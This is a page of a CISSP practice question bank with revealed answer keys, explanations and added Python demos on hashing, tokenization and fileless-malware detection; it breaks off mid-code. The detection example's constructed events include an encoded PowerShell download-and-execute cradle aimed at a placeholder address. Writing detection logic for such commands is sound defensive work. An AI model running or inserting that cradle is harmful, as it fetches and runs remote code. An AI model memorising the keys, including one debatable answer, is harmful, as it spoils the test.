Certified Information Systems Security Professional CISSP (CISSP) — Questions 226–300

529 questions total · 8 pages · All types, answers revealed

Page 4 of 8
226
MCQ · hard

A financial services company has a hybrid cloud environment with on-premises servers and a public cloud provider. The security team recently discovered that an attacker exfiltrated sensitive customer data from a cloud storage bucket. The investigation reveals that the bucket was configured with a bucket policy that allowed anonymous read access. The security architect must redesign the architecture to prevent such incidents. The company uses AWS for cloud services. The architect proposes the following: (1) Enable AWS CloudTrail and Amazon GuardDuty for monitoring. (2) Implement AWS Identity and Access Management (IAM) roles for applications instead of long-term access keys. (3) Use AWS Key Management Service (KMS) to encrypt data at rest. (4) Configure a VPC with a NAT gateway and private subnets for all compute resources. (5) Implement S3 bucket policies that deny all access unless explicitly allowed by a specific IAM role. During a review, the chief information security officer (CISO) points out that one of these measures does not directly address the root cause of the incident. Which measure is least effective in preventing unauthorized access to S3 buckets?

A. Use AWS KMS to encrypt data at rest
B. Configure a VPC with private subnets and a NAT gateway
C. Enable AWS CloudTrail and Amazon GuardDuty for monitoring
D. Implement IAM roles for applications instead of long-term access keys
Answer: C

Monitoring detects but does not prevent misconfigurations.

Why this answer

Option C (enabling AWS CloudTrail and Amazon GuardDuty) is a detective control, not a preventive one. The root cause of the incident was a misconfigured bucket policy that allowed anonymous read access. Monitoring tools can detect unauthorized access after it occurs but cannot prevent it.

The other options directly address the root cause by enforcing least privilege, encrypting data, or restricting network access.

Exam trap

The trap here is confusing detective controls (monitoring) with preventive controls (access policies, encryption, network segmentation), leading candidates to think that enabling logging and threat detection directly prevents the root cause of a misconfigured bucket policy.

How to eliminate wrong answers

Option A is wrong because encrypting data at rest with AWS KMS does not prevent unauthorized access; it only protects data confidentiality if access is gained, but the root cause is a permissive bucket policy that allows anonymous read access. Option B is wrong because configuring a VPC with private subnets and a NAT gateway does not affect S3 bucket policies; S3 is a global service and bucket policies are evaluated independently of network architecture. Option D is wrong because implementing IAM roles instead of long-term access keys addresses credential management but does not prevent anonymous access granted by a bucket policy; the incident occurred because the bucket policy allowed anonymous read, not because of compromised keys.

227
MCQ · hard

An organization is adopting DevOps. Which of the following is a primary security concern when integrating security into CI/CD pipelines?

A. Credential management for automated tools.
B. Increased number of releases.
C. Automated testing slows down deployment.
D. Resistance from development teams.
Answer: A

Hardcoded or improperly stored credentials are a common attack vector.

Why this answer

Credential management is critical; secrets like API keys and passwords often leak in pipeline logs or repositories. Automated testing does not inherently slow deployment if properly designed. Increased release frequency can be managed.

Resistance is a cultural issue, not a technical security concern.

228
Multi-Select · hard

Which THREE of the following are valid considerations when implementing data loss prevention (DLP) controls to protect sensitive data? (Select three.)

Select 3 answers
A. Integration with all third-party applications
B. User training to reduce false positives and increase acceptance
C. Monitoring of data in use, in motion, and at rest
D. Data classification schemes to identify sensitive data
E. Blocking all data transfers to external devices
Answers: B, C, D

User training helps users understand why DLP blocks certain actions, reducing frustration.

Why this answer

Option B is correct because user training is a critical component of a successful DLP implementation. Without proper training, users may inadvertently trigger false positives by mishandling data or may attempt to bypass controls they perceive as overly restrictive. Training helps users understand classification labels and proper data handling procedures, reducing the operational burden on security teams and increasing overall acceptance of DLP policies.

Exam trap

The trap here is that candidates often assume DLP must be all-encompassing (e.g., blocking all transfers or integrating with every app), but the CISSP emphasizes risk-based, balanced controls that include user awareness and layered monitoring.

229
MCQ · easy

A small business wants to implement a security policy that balances protection with usability. Which of the following is the MOST important factor when developing the policy?

A. Adopting a template from a similar organization to save time.
B. Aligning the policy with business objectives and risk appetite.
C. Ensuring the policy is enforceable with technical controls.
D. Basing the policy solely on regulatory compliance requirements.
Answer: B

Correct - Policy must support business needs and address real risks.

Why this answer

Option B is correct because a security policy must be aligned with the organization's business objectives and risk appetite to ensure it supports operations without imposing unnecessary restrictions. For a small business, this balance is critical—overly strict controls can hinder productivity, while weak controls increase risk. The policy should reflect the specific threats and tolerances of the business, not generic templates or compliance-only checklists.

Exam trap

The trap here is that candidates often confuse 'enforceability' (Option C) with policy effectiveness, but the CISSP emphasizes that policy must first be business-aligned; technical enforcement is a later step in the governance hierarchy.

How to eliminate wrong answers

Option A is wrong because adopting a template from a similar organization ignores the unique risk profile, business processes, and regulatory environment of the small business, leading to misaligned controls and potential gaps. Option C is wrong because enforceability with technical controls is a secondary consideration—the policy must first define what is acceptable; technical controls are implementation details that can be adjusted later. Option D is wrong because basing the policy solely on regulatory compliance requirements creates a minimum-security baseline that may not address the business's actual risk exposure or operational needs, leaving it vulnerable to non-compliance-related threats.

230
MCQ · medium

A multinational corporation is expanding its operations into a new country with strict data protection laws. The company needs to ensure compliance while maintaining operational efficiency. Which of the following is the BEST approach to manage this risk?

A. Accept the risk of non-compliance as a cost of doing business and set aside a contingency fund for fines.
B. Assign legal counsel to review local laws and implement a one-time compliance checklist.
C. Create a uniform global privacy policy that satisfies all jurisdictions with minimal adjustments.
D. Adopt a privacy-by-design framework and conduct a Data Protection Impact Assessment (DPIA) before launching operations.
Answer: D

Correct - Privacy-by-design and DPIA ensure compliance is built into processes.

Why this answer

Option D is correct because a privacy-by-design framework ensures data protection is embedded into systems and processes from the outset, while a Data Protection Impact Assessment (DPIA) systematically identifies and mitigates privacy risks specific to the new jurisdiction. This proactive, risk-based approach aligns with regulatory requirements like the GDPR and demonstrates due diligence, reducing the likelihood of non-compliance and operational disruption.

Exam trap

The trap here is that candidates often choose Option B (one-time compliance checklist) because it seems practical and legally focused, but they overlook that privacy compliance is an ongoing process requiring continuous risk assessment and adaptation, not a single review event.

How to eliminate wrong answers

Option A is wrong because accepting non-compliance risk as a cost of doing business ignores legal obligations and can lead to severe penalties, reputational damage, and operational bans, which is not a viable risk management strategy under strict data protection laws. Option B is wrong because a one-time compliance checklist is static and fails to address ongoing regulatory changes, data lifecycle management, and the need for continuous monitoring and adaptation required by modern privacy frameworks. Option C is wrong because a uniform global privacy policy cannot satisfy all jurisdictions due to conflicting requirements (e.g., GDPR’s strict consent vs. other laws’ legitimate interest provisions), and minimal adjustments often result in gaps that violate local laws.

231
Multi-Select · hard

Which TWO of the following are valid data de-identification techniques?

Select 2 answers
A. Encryption
B. Access control
C. Data masking
D. Backup
E. Tokenization
Answers: C, E

Masking obscures sensitive data, often permanently.

Why this answer

Data masking is a valid de-identification technique because it irreversibly obscures specific data values, such as replacing real credit card numbers with fictional ones, while preserving the data format for testing or analytics. Unlike encryption, masking does not allow reversal to the original value, ensuring the data is no longer personally identifiable. It is commonly used in non-production environments to protect sensitive information.

Exam trap

The trap here is that candidates often confuse encryption with de-identification, but encryption is reversible and does not permanently remove the link to the individual, whereas de-identification techniques like masking and tokenization are designed to be irreversible or non-reversible in the context of the original data.

232
Multi-Select · hard

Which THREE of the following are commonly used metrics for measuring the effectiveness of a vulnerability management program?

Select 3 answers
A. Patch coverage percentage
B. Mean time to detect (MTTD)
C. Mean time to remediate (MTTR)
D. Number of vulnerabilities per scan
E. Number of security incidents
Answers: A, C, D

Coverage measures the extent of systems patched.

Why this answer

Patch coverage percentage is a direct measure of vulnerability management effectiveness because it tracks the proportion of systems that have received required patches. A high patch coverage percentage indicates that the organization is successfully applying fixes to known vulnerabilities, reducing the attack surface. This metric is commonly used in vulnerability management programs to assess the completeness of remediation efforts.

Exam trap

The trap here is that candidates confuse Mean Time to Detect (MTTD) and Mean Time to Remediate (MTTR) as both being relevant to vulnerability management, but MTTD is specific to incident response, not to the proactive patching and remediation cycle measured by MTTR and patch coverage.

233
MCQ · easy

A network administrator notices that users in the accounting department can access the internet but are unable to access the internal payroll server (10.10.10.50). The firewall rule allows traffic from the accounting subnet (10.10.20.0/24) to the payroll server. What is the most likely issue?

A. DNS is not resolving the payroll server's IP address.
B. The payroll server's default gateway does not have a route back to 10.10.20.0/24.
C. The firewall rule is applied to the outbound interface only.
D. The accounting subnet is blocked by an implicit deny rule.
Answer: B

Without a return route, packets from the server cannot reach the accounting subnet.

Why this answer

The most likely issue is that the payroll server's default gateway does not have a route back to the accounting subnet (10.10.20.0/24). Even if the firewall permits outbound traffic from the accounting subnet to the payroll server, the return traffic from the server must be routed back through the firewall or a router that knows how to reach 10.10.20.0/24. Without a return route, the server's response packets are dropped, causing a one-way communication failure.

Exam trap

The trap here is that candidates often focus on firewall rule direction (inbound vs. outbound) or DNS, overlooking the fundamental requirement for symmetric routing and the fact that the server's default gateway must know how to reach the source subnet.

How to eliminate wrong answers

Option A is wrong because DNS resolution is irrelevant when the user is accessing the payroll server by its IP address (10.10.10.50), not a hostname. Option C is wrong because firewall rules are typically applied to inbound and outbound interfaces; if the rule is applied only to the outbound interface, it would still allow traffic leaving the accounting subnet, but the real issue is the lack of a return route, not the firewall rule placement. Option D is wrong because an implicit deny rule would block all traffic not explicitly permitted, but the question states the firewall rule allows traffic from the accounting subnet to the payroll server, so the implicit deny is not the cause of the specific failure.

234
MCQ · medium

A government agency requires a new secure document management system that enforces mandatory access control with the properties that users cannot read documents at a higher classification and cannot write documents to a lower classification (to prevent data leaking). The system must also support different categories (compartments) within the same classification level, and a user with access to one compartment should not be able to access another compartment unless explicitly allowed. The architect is considering the Bell-LaPadula model. However, the Bell-LaPadula model's *-property (no write-down) addresses the write issue, but there is also a need to handle compartment isolation. Which additional model or mechanism should be incorporated to ensure compartment isolation?

A. Apply the Brewer-Nash (Chinese Wall) model, which enforces conflict of interest by preventing access to multiple compartments that conflict.
B. Implement Biba's integrity model, which prevents write-up, thus complementing Bell-LaPadula.
C. Use a lattice-based access control (LBAC) that extends Bell-LaPadula by defining a security lattice that includes compartments and categories, ensuring that a subject's clearance must dominate the object's classification, including compartments.
D. Use role-based access control (RBAC) to define compartments.
Answer: C

LBAC naturally handles multiple compartments within a classification level.

Why this answer

Option C is correct because lattice-based access control (LBAC) extends the Bell-LaPadula model by defining a security lattice that includes both hierarchical classifications (e.g., Top Secret, Secret) and non-hierarchical categories (compartments). In this lattice, a subject's clearance must dominate an object's classification across both dimensions, ensuring that a user with access to one compartment cannot access another unless their clearance includes that specific category. This directly enforces the required compartment isolation while maintaining the *-property (no write-down) for data leakage prevention.

Exam trap

The trap here is that candidates may confuse the Brewer-Nash model's dynamic separation of duties with the static, lattice-based compartment isolation required by MAC, or incorrectly assume that Biba's integrity model can somehow enforce confidentiality-based compartment boundaries.

How to eliminate wrong answers

Option A is wrong because the Brewer-Nash (Chinese Wall) model is designed to prevent conflict of interest in commercial environments by dynamically restricting access to competing datasets, not to enforce static compartment isolation within a single classification level as required by the government agency. Option B is wrong because Biba's integrity model focuses on preventing unauthorized modification (no write-up, no read-down) to protect data integrity, which does not address compartment isolation or complement Bell-LaPadula's confidentiality goals in this context. Option D is wrong because role-based access control (RBAC) assigns permissions based on job functions, not on a formal lattice of classifications and categories, and it lacks the mandatory, system-enforced dominance checks needed for compartment isolation in a mandatory access control (MAC) system.

235
Multi-Select · medium

Which TWO of the following are mandatory secure coding practices to prevent injection attacks? (Select exactly two.)

Select 2 answers
A. Encode output to the browser
B. Encrypt sensitive input data
C. Use custom error messages that detail the failure
D. Use parameterized queries or prepared statements
E. Validate and sanitize all user input
Answers: D, E

Separates SQL logic from data, preventing injection.

Why this answer

Options D and E are correct. Input validation ensures data conforms to expected patterns; parameterized queries separate code from data. Option A is wrong because output encoding defends against XSS, not injection.

Option C is wrong because error messages should not reveal internal details. Option B is wrong because encryption does not prevent injection.

236
Multi-Select · medium

A security manager is selecting controls to protect sensitive data. Which TWO are examples of administrative controls?

Select 2 answers
A. Security awareness training
B. Firewalls
C. Access control lists
D. Background checks
E. Encryption
Answers: A, D

Administrative control.

Why this answer

Administrative controls are policies, procedures, and training. Security awareness training (A) and background checks (D) are administrative. Firewalls (B) and encryption (E) are technical.

Access control lists (C) are technical.

237
MCQ · hard

A company is decommissioning a data center and needs to dispose of hard drives that contained highly confidential financial data. Which of the following methods provides the HIGHEST assurance that data cannot be recovered?

A. Overwriting the drives with multiple passes of random data
B. Shredding the drives into small pieces
C. Degaussing the drives
D. Overwriting the drives with a single pass of zeros
Answer: B

Physical destruction makes data recovery physically impossible.

Why this answer

Shredding the drives into small pieces physically destroys the platters, making data recovery impossible regardless of the storage technology (e.g., HDD vs. SSD). This method provides the highest assurance because it eliminates any possibility of reading residual magnetic or solid-state data, even with advanced forensic tools like electron microscopy.

Exam trap

The trap here is that candidates often choose degaussing or multi-pass overwriting because they are familiar with these methods, but they fail to recognize that physical destruction is the only method that guarantees data irretrievability across all drive types, especially SSDs.

How to eliminate wrong answers

Option A is wrong because overwriting with multiple passes (e.g., Gutmann method) is effective for magnetic media but provides no assurance for SSDs or modern HDDs with high-density platters, and it is time-consuming; more importantly, it does not physically destroy the drive, so residual data could theoretically be recovered with specialized equipment. Option C is wrong because degaussing uses a strong magnetic field to erase data on HDDs, but it is ineffective on SSDs (which store data in NAND flash cells) and may leave the drive non-functional without guaranteeing complete erasure of all sectors. Option D is wrong because a single pass of zeros is sufficient for many modern HDDs (per NIST SP 800-88), but it does not address SSDs or provide the same level of assurance as physical destruction, and it leaves the drive intact for potential recovery attempts.

238
MCQ · medium

An organization needs to ensure that its employees understand their responsibilities regarding information security. Which of the following is the MOST effective way to achieve this?

A. Distribute a security policy document and require a signature.
B. Conduct a one-time annual security briefing.
C. Display security posters in common areas.
D. Implement a security awareness program with regular training and assessments.
Answer: D

Correct - ongoing training reinforces knowledge and measures effectiveness.

Why this answer

A security awareness program with regular training and assessments is the most effective way to ensure employees understand their responsibilities because it establishes a continuous learning cycle. Unlike one-time events, it reinforces secure behaviors through repetition, real-world scenarios, and measurable assessments, aligning with the NIST SP 800-50 framework for building a security-conscious culture.

Exam trap

The trap here is that candidates often mistake a one-time annual briefing (Option B) as sufficient due to its common use in compliance checklists, but the CISSP emphasizes continuous, behavior-changing programs over periodic, passive activities.

How to eliminate wrong answers

Option A is wrong because simply distributing a policy document and requiring a signature does not guarantee comprehension or retention; it relies on passive acknowledgment and lacks verification of understanding, which is a common failure point in compliance-driven approaches. Option B is wrong because a one-time annual briefing is insufficient to address evolving threats and employee turnover; it provides only a snapshot of knowledge without ongoing reinforcement, leading to decay of awareness over time. Option C is wrong because security posters in common areas are passive communication tools that lack interactivity and assessment; they may raise superficial awareness but fail to change behavior or ensure employees grasp their specific responsibilities.

239
Multi-Select · easy

An organization is planning a penetration test of its internal network. Which TWO of the following are essential elements to include in the test scope and rules of engagement?

Select 2 answers
A. List of specific exploitation tools to be used.
B. Time windows when testing is permitted (e.g., after business hours).
C. Schedule for automated vulnerability scanning of all external systems.
D. List of IP addresses and systems authorized for testing.
E. Detailed plan for exploiting client-side vulnerabilities.
Answers: B, D

Essential to avoid disruption.

Why this answer

Options B and D are correct because the rules of engagement must clearly define authorized targets and testing windows to avoid business disruption and legal issues. Option E is wrong because client-side attacks are not typically part of a network penetration test. Option C is wrong because vulnerability scanning is a different activity.

Option A is wrong because the specific tools to be used are not necessarily required in the scope, though they may be agreed upon.

240
MCQ · easy

Which of the following is the PRIMARY purpose of a business impact analysis (BIA) in business continuity planning?

A. Identify critical business functions and dependencies
B. Develop and test the continuity plan
C. Determine recovery time objectives (RTO) and recovery point objectives (RPO)
D. Create the business continuity plan document
Answer: A

BIA focuses on impact and prioritization.

Why this answer

The primary purpose of a business impact analysis (BIA) is to identify critical business functions and their dependencies on resources such as personnel, systems, data, and third-party services. This identification drives all subsequent continuity planning by quantifying the impact of disruptions and establishing the basis for recovery strategies. Without a BIA, recovery objectives and plans would be based on assumptions rather than empirical data about operational priorities.

Exam trap

The trap here is that candidates confuse the BIA's primary purpose with its outputs (RTO/RPO), but the BIA is fundamentally about identifying what is critical and why, not setting the numerical targets themselves.

How to eliminate wrong answers

Option B is wrong because developing and testing the continuity plan occurs after the BIA, using its outputs to design and validate recovery procedures; the BIA itself does not involve plan creation or testing. Option C is wrong because while RTO and RPO are derived from BIA findings, they are not the primary purpose—the BIA first identifies critical functions and dependencies, and then those metrics are calculated as part of the recovery strategy phase. Option D is wrong because creating the business continuity plan document is a separate step that synthesizes BIA results, recovery strategies, and procedures into a formal document; the BIA is an analytical input, not the document itself.

241
MCQ · hard

Refer to the exhibit. Which of the following statements is correct regarding the connections and access-list?

A. The access-list 'outside_in' is applied to the outside interface and is allowing the connections.
B. The UDP connection to 198.51.100.2:53 is being allowed by line 2 of the access-list.
C. The access-list 'outside_in' is not applied to any interface or is not the primary access-list governing inbound traffic.
D. The TCP connection to 203.0.113.5:443 is being denied by the implicit deny rule.
Answer: C

Correct. The connections exist but the access-list has 0 hits, implying either it is not applied or another rule is allowing traffic (e.g., an implicit permit for established connections).

Why this answer

The access-list 'outside_in' is intended to govern inbound traffic on the outside interface. However, the hit counts are all 0, meaning no packets are matching the access-list. This suggests that the access-list is not applied to the interface, that the interface has another access-list that allows the traffic, or that the connections are being permitted through other means (such as stateful inspection).

The connections are active, so traffic is passing through the ASA. The access-list with 0 hits indicates it is not the mechanism allowing the traffic.

242
MCQ · medium

A security administrator is configuring role-based access control (RBAC) for a cloud storage system. Which of the following is the best practice for assigning permissions?

A. Use access control lists on each object
B. Implement mandatory access control
C. Create roles based on job functions and assign users to roles
D. Assign permissions directly to users for flexibility
Answer: C

This is the core of RBAC.

Why this answer

Option C is correct because RBAC assigns permissions to roles, then users are assigned to roles, ensuring scalability and manageability. Option A is wrong because per-object permissions are difficult to manage. Option D is wrong because user-based permissions are not RBAC.

Option B is wrong because MAC is a different model.

243
MCQ · medium

An organization is implementing a bring-your-own-device (BYOD) policy. The security architect must ensure that corporate data on the device is protected from unauthorized access if the device is lost or stolen, while minimizing impact on user privacy. Which solution is most appropriate?

A. Use mobile device management (MDM) to create a secure container for corporate apps and data
B. Require employees to use company-issued devices only
C. Disable camera and microphone on the device
D. Full device encryption with remote wipe capability
Answer: A

Containerization isolates corporate data and allows selective wipe.

Why this answer

A secure container (often implemented via MDM with app wrapping or per-app VPN) creates an encrypted, isolated partition on the device for corporate apps and data. This ensures that if the device is lost or stolen, the corporate data remains encrypted and inaccessible without the container's authentication, while personal apps and data outside the container remain untouched, thus minimizing privacy impact.

Exam trap

The trap here is that candidates often choose full device encryption with remote wipe (Option D) because it sounds strong, but they overlook the privacy impact of wiping personal data, which the question explicitly states must be minimized.

How to eliminate wrong answers

Option B is wrong because requiring company-issued devices only eliminates BYOD entirely, failing to meet the policy's goal of allowing personal devices while protecting corporate data. Option C is wrong because disabling camera and microphone does not protect corporate data from unauthorized access on a lost or stolen device; it addresses data exfiltration via sensors, not storage security. Option D is wrong because full device encryption with remote wipe protects all data but wipes personal data too, violating the requirement to minimize impact on user privacy; it also lacks granularity for selective corporate data protection.

244
MCQ · easy

A large financial institution is finalizing its annual risk treatment plan based on a recent enterprise risk assessment. The risk appetite statement approved by the board specifies that the organization will accept only low residual risks for financial loss, but is willing to accept moderate risks for reputational damage if cost-benefit justifies. The risk register includes the following findings: 1) A critical SQL injection vulnerability in the online banking portal with high likelihood and critical impact; current controls include a web application firewall (WAF) that is not fully tuned. 2) Use of outdated TLS 1.0 encryption on internal communications between data centers; likelihood is medium, impact is low. 3) Lack of background checks for third-party vendors with access to sensitive data; likelihood is low, impact is moderate. 4) A single point of failure in the primary data center's power supply; likelihood is low, impact is critical. 5) An incident response plan that has not been tested in two years; likelihood is medium, impact is moderate. The CISO must prioritize actions for the upcoming quarter. What is the most appropriate first step?

A. Transfer the single point of failure risk by purchasing business interruption insurance.
B. Immediately remediate the SQL injection vulnerability by tuning the WAF and applying vendor patches.
C. Outsource incident response to a managed security service provider (MSSP) to compensate for the untested plan.
D. Accept the risk of outdated TLS 1.0 encryption because impact is low.
Answer: B

This addresses the highest risk with critical impact and likelihood, aligning with risk appetite.

Why this answer

Option B is correct. The SQL injection vulnerability has high likelihood and critical impact, resulting in a high risk that exceeds the risk appetite for financial loss. Immediate patching or other remediation is necessary to bring the risk to an acceptable level.

Option D (accept outdated encryption) is possible but not the highest priority. Option A (transfer the single point of failure) is valid, but the power supply risk has low likelihood; insurance may not be the first step. Option C (outsource incident response) is not the most urgent; testing the plan is less critical than addressing a high-risk vulnerability.

245
Multi-Select · medium

A company is implementing a digital signature system to ensure non-repudiation. The security architect must select a hash function that meets the required security properties. Which THREE of the following are necessary properties for the hash function?

Select 3 answers
A.Preimage resistance
B.Reversibility
C.Collision resistance
D.Second preimage resistance
E.Determinism
AnswersA, C, D

Correct: Preimage resistance ensures that given a hash, it is computationally infeasible to find any input that produces that hash.

Why this answer

A hash function used for signatures must be preimage resistant (given a digest, finding any input that produces it is infeasible), second-preimage resistant (given an input, finding a different input with the same digest is infeasible) and collision resistant (finding any two inputs with the same digest is infeasible). Reversibility is the opposite of what a hash provides. Determinism is a functional property every hash has, not a security property. For digital signatures, collision resistance is the decisive one: the signer signs H(m), so an attacker who can produce two documents with the same digest obtains a signature on the harmless one and presents it as a signature on the other, and the birthday bound makes collisions roughly 2^(n/2) work against 2^n for a preimage, which is why MD5 and SHA-1 were retired from signature use.
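As an added example that is not part of the original question bank, the following Python script makes the three properties concrete by shrinking SHA-256 to a 16-bit toy digest so brute force finishes in milliseconds: a second-preimage search costs about 2^16 tries, a birthday collision about 2^8, and a collision lets an attacker reuse a signature made over one document for another. The signing step is an HMAC under a constructed key standing in for a private-key signature, and all message strings are constructed.

```python
import hashlib
import hmac
import itertools

BITS = 16  # toy digest width; real SHA-256 is 256 bits, so these searches would be infeasible


def trunc_hash(data: bytes, bits: int = BITS) -> int:
    """Toy hash: the first `bits` bits of SHA-256. Deliberately weak so brute force finishes."""
    return int.from_bytes(hashlib.sha256(data).digest()[:4], "big") >> (32 - bits)


def find_second_preimage(target_msg: bytes, bits: int = BITS):
    """Second-preimage attack: given a fixed message, find a different one with the same digest.
    Expected cost ~2^bits tries, because every candidate must hit one specific value."""
    target = trunc_hash(target_msg, bits)
    for i in itertools.count():
        candidate = b"Pay attacker $1000 (variant %d)" % i
        if candidate != target_msg and trunc_hash(candidate, bits) == target:
            return candidate, i + 1


def find_collision(bits: int = BITS):
    """Birthday attack: find ANY two distinct messages with the same digest.
    Expected cost ~2^(bits/2) tries, which is why collision resistance is the hardest property."""
    seen = {}
    for i in itertools.count():
        msg = b"Contract draft %d" % i  # every message is distinct, so a repeat digest is a collision
        h = trunc_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg


# Stand-in for the signer's private-key operation: a MAC over the digest under a constructed key.
# A real scheme would use RSA or ECDSA; the point is that only the digest gets signed.
SIGNER_KEY = b"constructed-demo-signing-key"


def sign(msg: bytes) -> bytes:
    digest = trunc_hash(msg).to_bytes(2, "big")
    return hmac.new(SIGNER_KEY, digest, "sha256").digest()


def verify(msg: bytes, sig: bytes) -> bool:
    return hmac.compare_digest(sign(msg), sig)


if __name__ == "__main__":
    m1, m2, tries = find_collision()
    sig = sign(m1)  # the victim signs the harmless draft m1 ...
    print(f"collision after {tries} tries; forged {m2!r} verifies under m1's signature: {verify(m2, sig)}")
    forged, tries = find_second_preimage(b"Pay Alice $10")
    print(f"second preimage after {tries} tries: {forged!r}")
```

Run it a few times: the collision search settles in a few hundred tries while the second-preimage search needs tens of thousands, the same ratio that separates 2^128 from 2^256 for a real 256-bit digest.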

246
MCQeasy

A small business owner stores customer payment card data (cardholder data) in a legacy database that is not compliant with PCI DSS. The business is migrating to a new cloud-based point-of-sale (POS) system that uses tokenization. The owner wants to ensure that the legacy data is handled securely during the transition. Which of the following is the BEST approach?

A.Migrate the legacy data into the new POS system and have the tokenization service replace it
B.Encrypt the legacy database using AES-256 and store the encryption key on a separate server
C.Archive the legacy database to a tape backup and store it in a secure offsite vault
D.Tokenize the payment data in the legacy database, then securely purge the original cardholder data and verify the purge
AnswerD

Tokenization replaces sensitive data with a token, and purging eliminates the original data, reducing PCI scope.

Why this answer

Option D is correct because tokenizing the records, purging the original cardholder data, and then verifying that no residual card data remains (in every column, in free-text fields, and in backups and logs) means the legacy system no longer stores primary account numbers, which takes it out of PCI DSS scope. Option B is wrong because an encrypted copy is still stored cardholder data: it stays in scope and adds a key-management risk. Option C is wrong because an archived tape still retains the data and must be protected, tracked and eventually destroyed under PCI DSS for its whole retention period.

Option A is wrong because importing untokenized legacy data into the new POS first spreads cardholder data into another system before it is tokenized, enlarging scope during the transition.
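The two halves of the correct answer, tokenize and then verify the purge, are shown below as an added Python example (not from the question bank or any real POS vendor). The token vault, record layout and card numbers are constructed; the numbers are the well-known test PANs that pass the Luhn check but belong to no account. The verification scan deliberately searches every field, not just the PAN column, because that is where residual card data usually survives.

```python
import re
import secrets

# Constructed sample records using test card numbers (not real accounts).
SAMPLE_RECORDS = [
    {"id": 1, "customer": "A. Smith", "pan": "4111111111111111", "notes": "VIP"},
    {"id": 2, "customer": "B. Jones", "pan": "5555555555554444",
     "notes": "retry charge on 5555555555554444"},  # PAN leaked into a free-text field
]

PAN_PATTERN = re.compile(r"(?<!\d)\d{13,19}(?!\d)")


def luhn_valid(number: str) -> bool:
    """Luhn (mod 10) check used by payment card numbers; filters random digit runs out of scans."""
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


class TokenVault:
    """Format-agnostic tokenization: the token is random and has no mathematical link to the PAN,
    so tables that hold only tokens fall out of PCI DSS scope. The vault itself stays in scope."""

    def __init__(self):
        self._pan_by_token = {}

    def tokenize(self, pan: str) -> str:
        if not (PAN_PATTERN.fullmatch(pan) and luhn_valid(pan)):
            raise ValueError("not a plausible PAN")
        token = "tok_" + secrets.token_urlsafe(12)
        self._pan_by_token[token] = pan
        return token

    def detokenize(self, token: str) -> str:
        return self._pan_by_token[token]


def tokenize_records(records, vault: TokenVault):
    return [{**r, "pan": vault.tokenize(r["pan"])} for r in records]


def find_residual_pans(records):
    """Purge verification: scan EVERY field for Luhn-valid 13-19 digit runs."""
    hits = []
    for r in records:
        for field, value in r.items():
            for m in PAN_PATTERN.finditer(str(value)):
                if luhn_valid(m.group()):
                    hits.append((r["id"], field, m.group()))
    return hits


def purge_field(records, field: str):
    """Redact card-number-shaped runs from a field that the scan flagged."""
    return [{**r, field: PAN_PATTERN.sub("[REDACTED]", str(r[field]))} for r in records]


if __name__ == "__main__":
    vault = TokenVault()
    tokenized = tokenize_records(SAMPLE_RECORDS, vault)
    print("residual after tokenizing the PAN column:", find_residual_pans(tokenized))
    print("residual after purging notes:", find_residual_pans(purge_field(tokenized, "notes")))
```

In a real migration the same scan is run against database dumps, application logs and backup media before the legacy system is declared out of scope, and the vault (the one place the mapping exists) is the component that keeps PCI DSS controls.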

247
Multi-Selecteasy

Which THREE of the following are key activities in the recovery phase of incident response?

Select 3 answers
A.Identifying the root cause
B.Notifying law enforcement
C.Restoring systems from backups
D.Conducting post-incident review
E.Implementing containment measures
AnswersB, C, D

Recovery returns systems to production; law-enforcement notification and the post-incident review are the follow-up activities this item groups with it.

Why this answer

Restoring systems from backups is the core recovery activity: cleaned or rebuilt systems are returned to production, validated, and monitored for re-infection before normal operations resume. This item's key also places notifying law enforcement and the post-incident review in recovery because both happen after the threat is contained and eradicated, when the organization coordinates externally and documents what happened. A practitioner would add the caveat that NIST SP 800-61 treats post-incident activity as its own phase after recovery, and that law-enforcement contact can occur at any point (often during detection or containment, on advice of legal counsel); this item uses a broader recovery phase than NIST's model.

Exam trap

The trap is selecting root cause analysis (a detection-and-analysis or eradication activity) or containment measures, both of which precede recovery. Restoring operations is the unambiguous recovery activity; the other two correct options are the post-containment follow-up tasks this item counts as recovery.

248
MCQhard

A security team is evaluating a new endpoint detection and response (EDR) solution. Which of the following capabilities is MOST important for detecting fileless malware?

A.Static malware analysis.
B.Signature-based detection.
C.Behavioral analysis and process monitoring.
D.Network traffic inspection.
AnswerC

Detects runtime behaviors like PowerShell abuse or process injection.

Why this answer

Option C is correct because behavioral analysis and process monitoring detect the runtime activity that fileless malware cannot avoid. Fileless malware lives in memory, the registry, WMI event subscriptions or scheduled tasks rather than in a file on disk, so static analysis and signatures have nothing to scan; what remains observable is behaviour: PowerShell or WMI spawned by an Office process, encoded or hidden-window command lines, download cradles that load a payload straight into memory, reflective DLL loading, and process injection. Network inspection is a useful complement but misses activity that never leaves the host or is wrapped in TLS.
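As an added example (not EDR vendor code and not part of the question bank), the Python below runs a handful of behavioral rules over constructed process-creation events in the shape of Sysmon Event ID 1 or EDR telemetry. The sample events, paths and the 198.51.100.7 address are constructed; the rules are the ones analysts actually write for fileless tradecraft: an Office parent spawning a script host, an -EncodedCommand (base64 of UTF-16LE) that has to be decoded before content rules can see it, hidden-window and no-profile flags, and a download cradle.

```python
import base64
import re

ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')".encode("utf-16-le")
).decode()

# Constructed process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 1, "parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe report.txt"},
    {"pid": 2, "parent_image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 3, "parent_image": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\wscript.exe",
     "command_line": "wscript.exe //B C:\\Users\\Public\\u.js"},
    {"pid": 4, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\logs"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
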